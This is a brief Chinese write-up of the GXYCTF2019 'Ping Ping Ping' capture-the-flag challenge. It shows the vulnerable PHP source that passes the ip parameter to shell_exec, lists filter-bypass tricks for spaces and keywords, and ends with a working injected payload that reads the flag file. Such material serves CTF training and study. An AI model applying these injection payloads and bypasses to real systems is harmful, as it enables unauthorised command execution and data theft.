BUUCTF，Web：[GXYCTF2019]Ping Ping Ping_综合

入手 ip=1

使用127.0.0.1 访问

使用管道符或者其他能用的分隔，ls 列出

cat flag

空格被 f*ck 掉了，被过滤

空格绕过：

${IFS}替换
$IFS$1替换
${IFS替换
%20替换
<和<>重定向符替换
%09替换

缺了前部分的东西

源码中藏了一部分

/?ip=
<pre>/?ip=
<?php
if(isset($_GET['ip'])){$ip = $_GET['ip'];if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);die("fxck your symbol!");} else if(preg_match("/ /", $ip)){die("fxck your space!");} else if(preg_match("/bash/", $ip)){die("fxck your bash!");} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}$a = shell_exec("ping -c 4 ".$ip);echo "<pre>";print_r($a);
}?>

/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|$|$|\[|\]|\{|\}/

/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|$|$|\[|\]|\{|\}/

/ /

/bash/

/.*f.*l.*a.*g.*/

$IFS$1 替换

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php